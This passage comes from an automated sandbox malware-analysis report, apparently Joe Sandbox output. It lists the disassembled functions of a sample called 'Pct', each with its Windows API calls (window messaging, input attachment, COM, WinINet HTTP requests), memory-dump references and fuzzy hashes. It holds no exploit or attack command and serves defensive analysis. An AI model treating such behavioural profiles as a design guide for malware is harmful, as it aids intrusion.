                                                                                                                                                  • GetDlgCtrlID.USER32(?,?,?,00000111,?,?,?,?,0000018C,000000FF,00000002,?,?,ListBox,?), ref: 00C19BFF
                                                                                                                                                  • GetParent.USER32(?,00000111,?,?,00000111,?,?,?,?,0000018C,000000FF,00000002,?,?,ListBox,?), ref: 00C19C1B
                                                                                                                                                  • SendMessageW.USER32(00000000,?,?,00000111,?,?,?,?,0000018C,000000FF,00000002,?,?,ListBox,?), ref: 00C19C1E
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                  • API String ID: 1536045017-1403004172
                                                                                                                                                  • Opcode ID: 0c4a453b410a7dbaef55f518bd1ea326b4a7c83381ad32779c02aa9830bfddd9
                                                                                                                                                  • Instruction ID: 20122428dd0d083d6a7c4470908b823a06eab5e21f96ce1e9291255199bebece
                                                                                                                                                  • Opcode Fuzzy Hash: 0c4a453b410a7dbaef55f518bd1ea326b4a7c83381ad32779c02aa9830bfddd9
                                                                                                                                                  • Instruction Fuzzy Hash: 3B21C174900204BBCF04EBA4CC95EFEBBB5EF96310F104156F961A72D1EB7449A4AB60
                                                                                                                                                  Function 00C19C32 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BD1A36: _memmove.LIBCMT ref: 00BD1A77
                                                                                                                                                    • Part of subcall function 00C1B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00C1B7BD
                                                                                                                                                  • SendMessageW.USER32(?,00000186,00000002,00000000,?,?,ListBox,?,?,ComboBox), ref: 00C19CB5
                                                                                                                                                  • GetDlgCtrlID.USER32(?,?,?,00000186,00000002,00000000,?,?,ListBox,?,?,ComboBox), ref: 00C19CC0
                                                                                                                                                  • GetParent.USER32(?,00000111,?,?,?,?,00000186,00000002,00000000,?,?,ListBox,?,?,ComboBox), ref: 00C19CDC
                                                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?,?,?,?,00000186,00000002,00000000,?,?,ListBox,?,?,ComboBox), ref: 00C19CDF
                                                                                                                                                  • GetDlgCtrlID.USER32(?,?,?,00000111,?,?,?,?,00000186,00000002,00000000,?,?,ListBox,?), ref: 00C19CE8
                                                                                                                                                  • GetParent.USER32(?,00000111,?,?,00000111,?,?,?,?,00000186,00000002,00000000,?,?,ListBox,?), ref: 00C19D04
                                                                                                                                                  • SendMessageW.USER32(00000000,?,?,00000111,?,?,?,?,00000186,00000002,00000000,?,?,ListBox,?), ref: 00C19D07
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                  • API String ID: 1536045017-1403004172
                                                                                                                                                  • Opcode ID: 45a654f305429cd5f221f77a4c8214ddb7d9cc3b47b11d3f5a4fd14d34391a5b
                                                                                                                                                  • Instruction ID: 291ad6f5fe441f4d60c1a296f91ce7ce11679d6e404e96e7cf8b33cbee341313
                                                                                                                                                  • Opcode Fuzzy Hash: 45a654f305429cd5f221f77a4c8214ddb7d9cc3b47b11d3f5a4fd14d34391a5b
                                                                                                                                                  • Instruction Fuzzy Hash: 6921D375900204BBDF00ABA4CC95FFEBBB9FF96300F104052F961A7291EB754994AB20
                                                                                                                                                  Function 00C38F95 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • #8.OLEAUT32(?), ref: 00C38FC1
                                                                                                                                                  • CoInitialize.OLE32(00000000,00C50980), ref: 00C38FEE
                                                                                                                                                  • CoUninitialize.OLE32 ref: 00C38FF8
                                                                                                                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 00C390F8
                                                                                                                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 00C39225
                                                                                                                                                  • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00C53BDC), ref: 00C39259
                                                                                                                                                  • CoGetObject.OLE32(?,00000000,00C53BDC,?), ref: 00C3927C
                                                                                                                                                  • SetErrorMode.KERNEL32(00000000), ref: 00C3928F
                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00C3930F
                                                                                                                                                  • #9.OLEAUT32(?), ref: 00C3931F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorMode$Object$FileFromInitializeInstanceRunningTableUninitialize
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3414436084-0
                                                                                                                                                  • Opcode ID: 21816b51472f6b9dce05d4570b9b8026f545b894e328880494b47048c56d3df9
                                                                                                                                                  • Instruction ID: ea65af5744d560fe6ced71122f6b23b6b20e05961053aba8d08c7d60d109ce87
                                                                                                                                                  • Opcode Fuzzy Hash: 21816b51472f6b9dce05d4570b9b8026f545b894e328880494b47048c56d3df9
                                                                                                                                                  • Instruction Fuzzy Hash: 7EC123B1618305AFD700DF68C884A2BB7E9FF89348F10495CF98A9B251DB71ED45CB92
                                                                                                                                                  Function 00C219CD Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,00C20A67,?,00000001), ref: 00C219EF
                                                                                                                                                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00C20A67,?,00000001), ref: 00C21A03
                                                                                                                                                  • GetWindowThreadProcessId.USER32(00000000,?,?,?,?,?,00C20A67,?,00000001), ref: 00C21A0A
                                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C20A67,?,00000001), ref: 00C21A19
                                                                                                                                                  • GetWindowThreadProcessId.USER32(?,00000000,?,?,?,?,?,00C20A67,?,00000001), ref: 00C21A2B
                                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C20A67,?,00000001), ref: 00C21A44
                                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C20A67,?,00000001), ref: 00C21A56
                                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00C20A67,?,00000001), ref: 00C21A9B
                                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00C20A67,?,00000001), ref: 00C21AB0
                                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00C20A67,?,00000001), ref: 00C21ABB
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2156557900-0
                                                                                                                                                  • Opcode ID: 2b1305baaa6f4ccce036fba5dbdcc84430edb78a761da12d5118b5994f528a18
                                                                                                                                                  • Instruction ID: efe878c56128cdc11af11c81051369ebd6061bb81286f336c64030b685dfe1ed
                                                                                                                                                  • Opcode Fuzzy Hash: 2b1305baaa6f4ccce036fba5dbdcc84430edb78a761da12d5118b5994f528a18
                                                                                                                                                  • Instruction Fuzzy Hash: 8531DD75601314FFEB209F90EC48BAE77AAAB74316F244119FE00D6990CBB49F84DB64
                                                                                                                                                  Function 00BFC0E3 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetSysColor.USER32(00000008,00000000), ref: 00BC260D
                                                                                                                                                  • SetTextColor.GDI32(?,000000FF,00000000), ref: 00BC2617
                                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 00BC262C
                                                                                                                                                  • GetStockObject.GDI32(00000005), ref: 00BC2634
                                                                                                                                                  • GetClientRect.USER32(?), ref: 00BFC0FC
                                                                                                                                                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 00BFC113
                                                                                                                                                  • GetWindowDC.USER32(?), ref: 00BFC11F
                                                                                                                                                  • GetPixel.GDI32(00000000,?,?), ref: 00BFC12E
                                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00BFC140
                                                                                                                                                  • GetSysColor.USER32(00000005), ref: 00BFC15E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3430376129-0
                                                                                                                                                  • Opcode ID: 19ea4406e20e6bb5b8bedcf5a8584483f4e8695ef854b6685a18bc01afefacd6
                                                                                                                                                  • Instruction ID: 15dd5020d8eb1f79d474e13279967fe573a43bcd59dc3be8d6b2d1367aea6158
                                                                                                                                                  • Opcode Fuzzy Hash: 19ea4406e20e6bb5b8bedcf5a8584483f4e8695ef854b6685a18bc01afefacd6
                                                                                                                                                  • Instruction Fuzzy Hash: 33113A35500609BFDB615FA4ED48BEE7BB1EB18322F604265FE66E50E2CB310991EF11
                                                                                                                                                  Function 00BCAD98 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00BCADE1
                                                                                                                                                  • OleUninitialize.OLE32(?,00000000), ref: 00BCAE80
                                                                                                                                                  • UnregisterHotKey.USER32(?), ref: 00BCAFD7
                                                                                                                                                  • DestroyWindow.USER32(?), ref: 00C02F64
                                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00C02FC9
                                                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00C02FF6
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                  • String ID: close all
                                                                                                                                                  • API String ID: 469580280-3243417748
                                                                                                                                                  • Opcode ID: b5f1a38d573aec55098afa7a50da46ff6893670e19e92d4ff99cb9ec4213a643
                                                                                                                                                  • Instruction ID: 7ad366f55e13b99cfaca3ee351fccb13f4057b9f07679c659e1ec81d53ad0948
                                                                                                                                                  • Opcode Fuzzy Hash: b5f1a38d573aec55098afa7a50da46ff6893670e19e92d4ff99cb9ec4213a643
                                                                                                                                                  • Instruction Fuzzy Hash: 45A14D747022128FCB29EF54C599F69F7A4EF04744F1442EDE80AAB291DB31AE52CF91
                                                                                                                                                  Function 00C1AD69 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • EnumChildWindows.USER32(?,00C1B13A), ref: 00C1B078
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ChildEnumWindows
                                                                                                                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                  • API String ID: 3555792229-1603158881
                                                                                                                                                  • Opcode ID: 84f00ad78681fe0487435f50753053734cd7d751b8ade2d0cd9b222281220c0b
                                                                                                                                                  • Instruction ID: 020dc802329fad34dc71cd619f326d04b71636ca1e1e64c16c51182c564ad0f4
                                                                                                                                                  • Opcode Fuzzy Hash: 84f00ad78681fe0487435f50753053734cd7d751b8ade2d0cd9b222281220c0b
                                                                                                                                                  • Instruction Fuzzy Hash: 3E91B9B0500505EACB08EFA5C481BEEFBB5FF05310F148159E86AA7291DF306ED9EB91
                                                                                                                                                  Function 00BC31F6 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SetWindowLongW.USER32(?,000000EB,?,?,000000FF,?,000000FF), ref: 00BC327E
                                                                                                                                                    • Part of subcall function 00BC218F: GetClientRect.USER32(?,?), ref: 00BC21B8
                                                                                                                                                    • Part of subcall function 00BC218F: GetWindowRect.USER32(?,?), ref: 00BC21F9
                                                                                                                                                    • Part of subcall function 00BC218F: ScreenToClient.USER32(?,?), ref: 00BC2221
                                                                                                                                                  • GetDC.USER32 ref: 00BFD073
                                                                                                                                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00BFD086
                                                                                                                                                  • SelectObject.GDI32(00000000,00000000,?,00000031,00000000,00000000), ref: 00BFD094
                                                                                                                                                  • SelectObject.GDI32(00000000,00000000,?,00000031,00000000,00000000), ref: 00BFD0A9
                                                                                                                                                  • ReleaseDC.USER32(?,00000000,?,00000031,00000000,00000000), ref: 00BFD0B1
                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00BFD13C
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                  • String ID: U
                                                                                                                                                  • API String ID: 4009187628-3372436214
                                                                                                                                                  • Opcode ID: 47399528716d918e5fb8ca2b46ce9a6d247a68377cbf46c2c441c3cf1ee40793
                                                                                                                                                  • Instruction ID: 613b92130f89d0141150b554d4e90f78edeebc568525a12819f2488c697e87fd
                                                                                                                                                  • Opcode Fuzzy Hash: 47399528716d918e5fb8ca2b46ce9a6d247a68377cbf46c2c441c3cf1ee40793
                                                                                                                                                  • Instruction Fuzzy Hash: BD71E231500209DFCF219F64C894FBA7BF6FF49320F2442A9EE55AB1A5CB318995DB60
                                                                                                                                                  Function 00C4C634 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BC29E2: GetWindowLongW.USER32(?,000000EB,?,?,?,00BC1CE4,?), ref: 00BC29F3
                                                                                                                                                    • Part of subcall function 00BC2714: GetCursorPos.USER32(?,?,00C877B0,?,00C877B0,00C877B0,?,00C4C5FF,00000000,00000001,?,?,?,00BFBD40,?,?), ref: 00BC2727
                                                                                                                                                    • Part of subcall function 00BC2714: ScreenToClient.USER32(00C877B0,?,?,00C4C5FF,00000000,00000001,?,?,?,00BFBD40,?,?,?,?,?,00000001), ref: 00BC2744
                                                                                                                                                    • Part of subcall function 00BC2714: GetAsyncKeyState.USER32(00000001,?,00C4C5FF,00000000,00000001,?,?,?,00BFBD40,?,?,?,?,?,00000001,?), ref: 00BC2769
                                                                                                                                                    • Part of subcall function 00BC2714: GetAsyncKeyState.USER32(00000002,?,00C4C5FF,00000000,00000001,?,?,?,00BFBD40,?,?,?,?,?,00000001,?), ref: 00BC2777
                                                                                                                                                  • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00C4C69C
                                                                                                                                                  • ImageList_EndDrag.COMCTL32 ref: 00C4C6A2
                                                                                                                                                  • ReleaseCapture.USER32 ref: 00C4C6A8
                                                                                                                                                  • SetWindowTextW.USER32(?,00000000,?,?,00000000,?,00000000), ref: 00C4C752
                                                                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00C4C765
                                                                                                                                                  • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00C4C847
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                  • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                  • API String ID: 1924731296-2107944366
                                                                                                                                                  • Opcode ID: 82b2732d946635f34e062a7b1bfbe002e4cc039e31a9bf9c6c3684cbcf00ac58
                                                                                                                                                  • Instruction ID: f077175acf2b9e0939a79dc779167a79a6e4cc5bfa19c384c5634ddeed605eee
                                                                                                                                                  • Opcode Fuzzy Hash: 82b2732d946635f34e062a7b1bfbe002e4cc039e31a9bf9c6c3684cbcf00ac58
                                                                                                                                                  • Instruction Fuzzy Hash: DB516974204305AFDB00EF14C89AF6E7BE1FB84314F108A2DF9A5972E2DB70A945CB56
                                                                                                                                                  Function 00C320E1 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00C3211C
                                                                                                                                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?), ref: 00C32148
                                                                                                                                                  • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C3218A
                                                                                                                                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004,?,?,?,?,?,?,?,?,?), ref: 00C3219F
                                                                                                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 00C321AC
                                                                                                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 00C321DC
                                                                                                                                                  • InternetCloseHandle.WININET(00000000,0000000D,DEADBEEF,00000000,?,?,?,?,?,?,?,?,?), ref: 00C32223
                                                                                                                                                    • Part of subcall function 00C32B4F: GetLastError.KERNEL32(?,?,00C31EE3,00000000,00000000,00000001), ref: 00C32B64
                                                                                                                                                    • Part of subcall function 00C32B4F: SetEvent.KERNEL32(?,?,00C31EE3,00000000,00000000,00000001), ref: 00C32B79
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2603140658-3916222277
                                                                                                                                                  • Opcode ID: 82179f5a22a3ecbec447af7501bf76d9ff53f4c64bd6b996156d345f18898e59
                                                                                                                                                  • Instruction ID: 368863059211fd48827abb4970c1b21c69b202d3b836a3c429cbfca002f3e271
                                                                                                                                                  • Opcode Fuzzy Hash: 82179f5a22a3ecbec447af7501bf76d9ff53f4c64bd6b996156d345f18898e59
                                                                                                                                                  • Instruction Fuzzy Hash: 30417CB5510608BFEF129F50CC89FBF7BACEF08354F104116FA15AA141D771AE449BA0
                                                                                                                                                  Function 00C39330 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00C50980), ref: 00C39412
                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00C50980), ref: 00C39446
                                                                                                                                                  • #164.OLEAUT32(?,?,?,?,?,?,00C50980), ref: 00C395C0
                                                                                                                                                  • #6.OLEAUT32(?,?,?,00C50980), ref: 00C395EA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: #164FileFreeLibraryModuleName
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2716333841-0
                                                                                                                                                  • Opcode ID: b81018c5d368d022e0d87dde81b2718c3166f4065abd3568de010eb6ab87cf81
